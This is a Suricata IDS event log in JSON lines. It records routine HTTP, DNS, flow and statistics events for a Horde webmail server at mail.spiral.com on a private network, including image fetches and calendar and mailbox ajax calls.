{"timestamp":"2020-02-29T00:11:36.003246+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":213},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/flags\/unseen-inv.png","state":"CLOSED","stored":false,"size":213,"tx_id":1}} 
{"timestamp":"2020-02-29T00:11:36.013992+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312}} {"timestamp":"2020-02-29T00:11:36.023877+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":7550,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:36.041297+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248}} {"timestamp":"2020-02-29T00:11:36.054763+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":312},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/delete.png","state":"CLOSED","stored":false,"size":312,"tx_id":2}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:36.132194+0000","flow_id":1911890401320261,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60822,"proto":"UDP","dns":{"type":"answer","id":7550,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840}} {"timestamp":"2020-02-29T00:11:36.211121+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":244,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.257907+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/imp\/showMessage","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1840},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/imp\/showMessage","state":"CLOSED","stored":false,"size":4763,"tx_id":3}} {"timestamp":"2020-02-29T00:11:36.259305+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/reply.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":248},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/reply.png","state":"CLOSED","stored":false,"size":248,"tx_id":1}} 
{"timestamp":"2020-02-29T00:11:36.259648+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:11:36.260038+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485}} {"timestamp":"2020-02-29T00:11:36.261237+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/arrow_collapsed.png","state":"CLOSED","stored":false,"size":234,"tx_id":2}} 
{"timestamp":"2020-02-29T00:11:36.263342+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/plus.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":485},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/plus.png","state":"CLOSED","stored":false,"size":485,"tx_id":4}} {"timestamp":"2020-02-29T00:11:36.305361+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297}} {"timestamp":"2020-02-29T00:11:36.305392+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} 
{"timestamp":"2020-02-29T00:11:37.000761+0000","flow_id":826869973231761,"event_type":"flow","src_ip":"192.168.10.122","src_port":35205,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":2,"pkts_toclient":1,"bytes_toserver":255,"bytes_toclient":141,"start":"2020-02-29T00:06:31.436369+0000","end":"2020-02-29T00:06:36.553564+0000","age":5,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:11:37.019053+0000","flow_id":146057546899732,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34796,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6624},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":31912,"tx_id":0}} {"timestamp":"2020-02-29T00:11:38.244392+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36850,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:11:38.352829+0000","flow_id":402321488552,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34159,"proto":"UDP","dns":{"type":"answer","id":36850,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:38.920615+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340}} {"timestamp":"2020-02-29T00:11:39.182692+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24340},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.193045+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19489,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:39.300002+0000","flow_id":128482540935253,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34798,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6982},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37765,"tx_id":0}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.301552+0000","flow_id":2068545038709269,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46427,"proto":"UDP","dns":{"type":"answer","id":19489,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629}} 
{"timestamp":"2020-02-29T00:11:39.336042+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.380794+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34800,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":629},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1644,"tx_id":1}} {"timestamp":"2020-02-29T00:11:39.390757+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39025,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.498900+0000","flow_id":1991905642280549,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57395,"proto":"UDP","dns":{"type":"answer","id":39025,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.525557+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5490,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:39.535760+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52726,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/print.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/print.png","state":"CLOSED","stored":false,"size":349,"tx_id":3}} 
{"timestamp":"2020-02-29T00:11:39.536000+0000","flow_id":150206485572827,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/arrow_expanded.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:11:39.535374+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52724,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/download.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":297},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/download.png","state":"CLOSED","stored":false,"size":297,"tx_id":5}} {"timestamp":"2020-02-29T00:11:39.535761+0000","flow_id":1202052566297535,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/newwin.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/imp\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":316}} 
{"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:11:39.634046+0000","flow_id":787184495559925,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53470,"proto":"UDP","dns":{"type":"answer","id":5490,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608}} {"timestamp":"2020-02-29T00:11:39.691269+0000","flow_id":701495603006587,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":608},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":2}} 
{"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:11:39.696995+0000","flow_id":1062938575886898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":0}} {"timestamp":"2020-02-29T00:11:40.136642+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19706,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:11:40.244904+0000","flow_id":1085409844794818,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48282,"proto":"UDP","dns":{"type":"answer","id":19706,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:11:40.356634+0000","flow_id":1573653137124388,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34804,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5018}} {"timestamp":"2020-02-29T00:11:41.000189+0000","event_type":"stats","stats":{"uptime":14353,"capture":{"kernel_packets":134731,"kernel_drops":0},"decoder":{"pkts":134769,"bytes":92953515,"invalid":185,"ipv4":133284,"ipv6":8,"ethernet":134769,"raw":0,"null":0,"sll":0,"tcp":128038,"udp":5046,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2750,"ssn_memcap_drop":0,"pseudo":344,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2766,"synack":2757,"rst":1199,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_m
emuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1791,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2304,"failed_udp":111},"tx":{"http":4609,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2383}},"flow_mgr":{"closed_pruned":2727,"new_pruned":15,"est_pruned":2352,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22816,"memcap_state":0,"memcap_global":0},"http":{"memuse":200557,"memcap":0}}} {"timestamp":"2020-02-29T00:11:42.000260+0000","flow_id":157748428880946,"event_type":"flow","src_ip":"192.168.10.122","src_port":46214,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:06:41.867378+0000","end":"2020-02-29T00:06:41.975863+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 